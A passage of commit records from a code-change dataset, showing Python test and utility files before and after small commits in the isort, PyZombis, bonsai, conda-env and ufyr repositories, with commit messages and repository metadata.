from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
Fix use of default config to match new refactorfrom hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| <commit_before>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
<commit_msg>Fix use of default config to match new refactor<commit_after>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
|
39309bb0b8fe088b6576cfbf4d744f58ca6b1b0b | tests/test_quiz1.py | tests/test_quiz1.py | from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright) | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| Convert sample test to pytest | Convert sample test to pytest
| Python | agpl-3.0 | PyAr/PyZombis,PyAr/PyZombis,PyAr/PyZombis | from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)Convert sample test to pytest | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| <commit_before>from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)<commit_msg>Convert sample test to pytest<commit_after> | def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)Convert sample test to pytestdef test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
| <commit_before>from playwright.sync_api import sync_playwright
def run(playwright):
browser = playwright.chromium.launch(headless=False, slow_mo=100)
context = browser.new_context()
# Open new page
page = context.new_page()
page.goto("http://pyar.github.io/PyZombis/master/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)<commit_msg>Convert sample test to pytest<commit_after>def test_quiz1_2(page):
page.goto("/quiz/Quiz1.html")
page.click("text=def metros_a_milimetros(n):")
page.press("text=def metros_a_milimetros(n):", "ArrowDown")
page.press("text=def metros_a_milimetros(n):", "Tab")
page.type("text=def metros_a_milimetros(n):", "return n * 1000")
page.click("#q1_2 >> *css=button >> text=Run")
page.hover("#q1_2 >> text=You passed:")
assert page.inner_text("#q1_2 >> text=You passed:") == "You passed: 100.0% of the tests"
element_handle = page.query_selector("[data-childcomponent='q1_2']")
element_handle.screenshot(path="screenshot.png")
|
254ecc95cdd0c2809328634e50882ea42fb32105 | tests/test_utils.py | tests/test_utils.py | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
| import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | Add simple call test for set_connect_async | Add simple call test for set_connect_async
| Python | mit | Noirello/PyLDAP,Noirello/bonsai,Noirello/PyLDAP,Noirello/PyLDAP,Noirello/bonsai,Noirello/bonsai | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
Add simple call test for set_connect_async | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | <commit_before>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
<commit_msg>Add simple call test for set_connect_async<commit_after> | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
Add simple call test for set_connect_asyncimport pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None | <commit_before>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
<commit_msg>Add simple call test for set_connect_async<commit_after>import pytest
from bonsai.utils import escape_filter_exp
from bonsai.utils import escape_attribute_value
from bonsai.utils import set_connect_async
def test_escape_attribute_value():
""" Test escaping special characters in attribute values. """
assert (
escape_attribute_value(" dummy=test,something+somethingelse")
== r"\ dummy\=test\,something\+somethingelse"
)
assert escape_attribute_value("#dummy=test ") == r"\#dummy\=test\ "
assert escape_attribute_value(r"term\0") == r"term\\0"
def test_escape_filter_exp():
""" Test escaping filter expressions. """
assert escape_filter_exp("(parenthesis)") == "\\28parenthesis\\29"
assert escape_filter_exp("cn=*") == "cn=\\2A"
assert escape_filter_exp("\\backslash") == "\\5Cbackslash"
assert escape_filter_exp("term\0") == "term\\0"
def test_set_async_connect(client):
""" Dummy test for set_connect_async. """
with pytest.raises(TypeError):
set_connect_async("true")
set_connect_async(False)
conn = client.connect()
assert conn is not None |
bff2488c184e142bfbf31e945b593e18db707dcc | conda_env/cli/main_export.py | conda_env/cli/main_export.py | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| Fix to use pip style == | Fix to use pip style ==
| Python | bsd-3-clause | isaac-kit/conda-env,conda/conda-env,nicoddemus/conda-env,isaac-kit/conda-env,phobson/conda-env,phobson/conda-env,mikecroucher/conda-env,asmeurer/conda-env,dan-blanchard/conda-env,conda/conda-env,ESSS/conda-env,dan-blanchard/conda-env,nicoddemus/conda-env,ESSS/conda-env,mikecroucher/conda-env,asmeurer/conda-env | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
Fix to use pip style == | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| <commit_before>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
<commit_msg>Fix to use pip style ==<commit_after> | from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
Fix to use pip style ==from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
| <commit_before>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
<commit_msg>Fix to use pip style ==<commit_after>from argparse import RawDescriptionHelpFormatter
from copy import copy
import yaml
from conda.cli import common
from conda.cli import main_list
from conda import install
description = """
Export a given environment
"""
example = """
examples:
conda env export
conda env export --file SOME_FILE
"""
def configure_parser(sub_parsers):
p = sub_parsers.add_parser(
'export',
formatter_class=RawDescriptionHelpFormatter,
description=description,
help=description,
epilog=example,
)
common.add_parser_prefix(p)
p.set_defaults(func=execute)
def execute(args, parser):
prefix = common.get_prefix(args)
installed = install.linked(prefix)
conda_pkgs = copy(installed)
# json=True hides the output, data is added to installed
main_list.add_pip_installed(prefix, installed, json=True)
pip_pkgs = sorted(installed - conda_pkgs)
dependencies = ['='.join(a.rsplit('-', 2)) for a in sorted(conda_pkgs)]
dependencies.append({'pip': ['=='.join(a.rsplit('-', 2)[:2]) for a in pip_pkgs]})
print(yaml.dump({'dependencies': dependencies}, default_flow_style=False))
|
5503a615db51a6ae0461cc0417c61ba508a43eae | ufyr/storage/utils.py | ufyr/storage/utils.py | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | Add in overwrite output file | Add in overwrite output file
| Python | unlicense | timeartist/ufyr | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
